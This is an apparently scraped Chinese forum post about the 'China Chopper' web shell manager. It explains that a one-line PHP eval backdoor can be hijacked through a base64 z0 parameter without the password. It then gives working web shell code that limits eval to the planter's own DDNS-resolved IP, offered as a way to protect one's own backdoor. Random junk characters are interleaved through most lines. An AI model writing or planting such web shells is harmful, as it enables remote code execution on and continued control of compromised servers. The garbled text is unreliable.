今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
% r) v- X# k0 _' w7 T$ W/ A7 i1 h% |/ N1 N5 D; Q! Y
就算你设置了密码,使用了eval($_REQUEST['moyo']);
4 O. F. p; {6 a: w* {7 M9 P2 ~
8 z# Q: g1 B4 u3 ]5 T但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
3 g! N' Z# i4 @6 ^4 B( U, u- p, X- C4 P' z/ Z [5 a
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
; F$ o7 t) [" ^- I; ?+ S- d8 s6 n7 @6 G' c
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
S3 m% J5 T: u7 d% k7 |( T4 | T
不知道是设计缺陷还是故意留的后门; @2 T* s. g, o& \- x
/ U. r6 h" i" L$ N
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用, F3 P* c# c- Z( a5 B8 y
: W$ c5 p v, g7 V' n8 L; s. g本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
& t& G |# ]7 P* Q7 {
1 t. w* m; B% I9 \7 T- K& a然后一句话后门这样写
- z6 m, Q. {; U0 H4 W7 A1 N" @; I) a: C! P/ I' J
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>" u1 b+ Y" Z2 `( v7 a, h
这样就可以让一句话后门只允许自己的电脑连接了7 ^2 _2 G7 {8 C b
7 Q6 z# z% e4 m0 B+ z2 G
|